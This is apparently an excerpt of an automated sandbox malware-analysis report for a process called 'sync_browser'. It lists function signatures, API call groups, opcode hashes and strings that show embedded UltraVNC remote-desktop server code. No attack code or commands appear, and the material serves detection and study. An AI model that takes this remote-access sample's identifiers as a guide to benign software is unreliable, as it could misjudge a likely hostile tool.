                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Desktop$Thread$CloseCurrentErrorInformationInputLastObjectOpenUser
                                                    • String ID: vncservice.cpp : !GetUserObjectInformation(inputdesktop$vncservice.cpp : !GetUserObjectInformation(threaddesktop$vncservice.cpp : OpenInputDesktop %i I$vncservice.cpp : OpenInputDesktop II$vncservice.cpp : failed to close input desktop$vncservice.cpp : threadname, inputname differ
                                                    • API String ID: 55935355-432259686
                                                    • Opcode ID: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                    • Instruction ID: 6a648d9135bcb90b5ad84f5f8444e423fed640fb29982642e0a32d5854a125ea
                                                    • Opcode Fuzzy Hash: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                    • Instruction Fuzzy Hash: 3E517F25E1869383FB18BB65A8455BDABA5EF84F88FC45033DD4E92264DF3CE105CB60
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Thread$Object$CloseCreateCurrentDesktopEventHandleInformationResetSingleTerminateUserWait
                                                    • String ID: Default$vncdesktopsink.cpp : ERROR: initwindowthread failed to start $vncdesktopsink.cpp : StartInitWindowthread $vncdesktopsink.cpp : StartInitWindowthread default desk$vncdesktopsink.cpp : StartInitWindowthread no default desk$vncdesktopsink.cpp : StartInitWindowthread reactivate$vncdesktopsink.cpp : StartInitWindowthread started
                                                    • API String ID: 3943905059-2958163836
                                                    • Opcode ID: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                    • Instruction ID: 8bc2b9761cc018008d0d1d64754f48a0a4c71ebdd09cccec9d1ff5b9be4c42b5
                                                    • Opcode Fuzzy Hash: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                    • Instruction Fuzzy Hash: EC413B21A1869697E714AB64E804AFDAB65FF84F88FC84133DD4D572A8DF3CD149C360
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteIconInfoObject
                                                    • String ID: vncencoderCursor.cpp : GetBitmapBits() failed.$vncencoderCursor.cpp : GetIconInfo() failed.$vncencoderCursor.cpp : GetObject() for bitmap failed.$vncencoderCursor.cpp : cursor bitmap handle is NULL.$vncencoderCursor.cpp : cursor handle is NULL.$vncencoderCursor.cpp : incorrect data in cursor bitmap.$vncencoderCursor.cpp : vncDesktop::GetRichCursorData() failed.
                                                    • API String ID: 2689914137-3853778978
                                                    • Opcode ID: 77911ed28bde51ff5fc71a6be3d2d9e23acdd3f772fbccf3515c1f8dc9cff10d
                                                    • Instruction ID: 4a315bd32302fd5a65ab6833f5235b9f6084365a9ab9da8c979832ac7deea2fb
                                                    • Opcode Fuzzy Hash: 77911ed28bde51ff5fc71a6be3d2d9e23acdd3f772fbccf3515c1f8dc9cff10d
                                                    • Instruction Fuzzy Hash: 15917071A086828BEB24BF6195407BDA7A4FB84F88FC04532EE4D97A55DF3CE149C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Global$Lock$AllocFreemalloc
                                                    • String ID: Unable to allocate memory in zip dll
                                                    • API String ID: 105282483-1808592719
                                                    • Opcode ID: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                    • Instruction ID: bb57686a56ea0f93c4ace0592aae2f22ff51248a6d9d0bea16691fb2b67bd1d0
                                                    • Opcode Fuzzy Hash: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                    • Instruction Fuzzy Hash: DD713722A0AB5287EB05EF64A4502BCA7A4FF88F89FC44136DE8E57354DF38E445C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$Token$ErrorInformationLastOpenWindow_errno$AllocAllocateCurrentEqualFindFreeHeapInitializeThread_callnewhmalloc
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 1145045407-2988720461
                                                    • Opcode ID: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                    • Instruction ID: 987a710312719fcb8dd16b490b26725cc9764de35e4cdd42d412d9c66203c711
                                                    • Opcode Fuzzy Hash: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                    • Instruction Fuzzy Hash: D5616E22A146828BEB50AF30D4406ADA7A4FF84B9CFC44136EE4D07A98DF3CE954C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseQueryValue$Openlstrlenmalloc
                                                    • String ID: @$Enterprise$Personal$ProductSuite$SBS$Small Business$System\CurrentControlSet\Control\ProductOptions$Terminal Server
                                                    • API String ID: 1137168859-3840687832
                                                    • Opcode ID: 32626daec1fe8a25ead540a82463a4f86ecf2e9460f47b6cecf95af5a5135861
                                                    • Instruction ID: 3b156144683452f3d8456baceb038925f2cf317c4e5c67aab57cf45cc2994c83
                                                    • Opcode Fuzzy Hash: 32626daec1fe8a25ead540a82463a4f86ecf2e9460f47b6cecf95af5a5135861
                                                    • Instruction Fuzzy Hash: E0416D31A0C65287FA10AB25E44467DEBA1EF85BC8FC40032EE9D47A69DF3CE155CB20
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$FullNamePath__doserrno_getdrive_invalid_parameter_noinfo
                                                    • String ID: .$:.
                                                    • API String ID: 2522281643-2811378331
                                                    • Opcode ID: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
                                                    • Instruction ID: bdfa0d7851f305c7665425219b84aeb5f1c80149b503944400af907c2b7ead3e
                                                    • Opcode Fuzzy Hash: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
                                                    • Instruction Fuzzy Hash: 39314C22A0D68287FB617B64D40037EA6A0AF85F48FD94437EE4C46686DF7CE94097B1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Service$Status$Library$AddressCloseCreateCtrlEventFreeHandleHandlerLoadMetricsProcRegisterSystem
                                                    • String ID: RegisterServiceCtrlHandlerExA$advapi32.dll$uvnc_service
                                                    • API String ID: 333848887-3586523739
                                                    • Opcode ID: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
                                                    • Instruction ID: e115f8a4d05e7ed2f5d5562625f7d7d8244abef4ee3eb5087e709bb4b4804998
                                                    • Opcode Fuzzy Hash: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
                                                    • Instruction Fuzzy Hash: C8414C31918B6687FA08BB69F854A7DABA0BF84F94FC04137DC5D066A4DF3CA444C724
                                                    APIs
                                                    Strings
                                                    • x, xrefs: 00007FF7D5960A25
                                                    • UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window, xrefs: 00007FF7D5960AAC
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Color$ObjectText$RectSelect$BitsBrushCreateDeleteDrawFillFlushSolid
                                                    • String ID: UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window$x
                                                    • API String ID: 3190128964-2508378015
                                                    • Opcode ID: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                    • Instruction ID: 713f905e34732fd146785baeb0d7bad5a227a081d28bd54e343e8091a4e5393c
                                                    • Opcode Fuzzy Hash: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                    • Instruction Fuzzy Hash: B8313D266186928BE740AF69E4449AEB760FFC9F98F840032EE4E47718DF7CD445C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateWindow$Thread$CombineCursorDeleteDesktopForegroundFromObjectPointRectTime_errno_invalid_parameter_noinfofreetime
                                                    • String ID: schook$w8hook
                                                    • API String ID: 2828954817-2864610768
                                                    • Opcode ID: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
                                                    • Instruction ID: abc7f39424473c92177d282456fd2e4e7dd727001bd3579c9c5891d46f8ec560
                                                    • Opcode Fuzzy Hash: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
                                                    • Instruction Fuzzy Hash: 06B14E32A0978687EB64AB25E4405AEB7A0FB84F88FC44137DE9E53755DF38E485C321
                                                    APIs
                                                    Strings
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF7D5945F1B
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7D5945F61
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF7D5945FC8
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF7D5946160
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7D5945FAF
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7D5945FF6
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                    • API String ID: 181403729-1081969236
                                                    • Opcode ID: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
                                                    • Instruction ID: 87d7502a740fdfe57869e3a02fd7d84b6c4138c889b11c6eae87760926e39c1e
                                                    • Opcode Fuzzy Hash: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
                                                    • Instruction Fuzzy Hash: 86612861A196D282E718AB65E4117FDBB90EF95B48FC44037EE9E4B291DF3CD50AC320
                                                    APIs
                                                    Strings
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF7D594557A
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7D59455BD
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF7D594561C
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF7D594577E
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7D5945603
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7D594564A
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
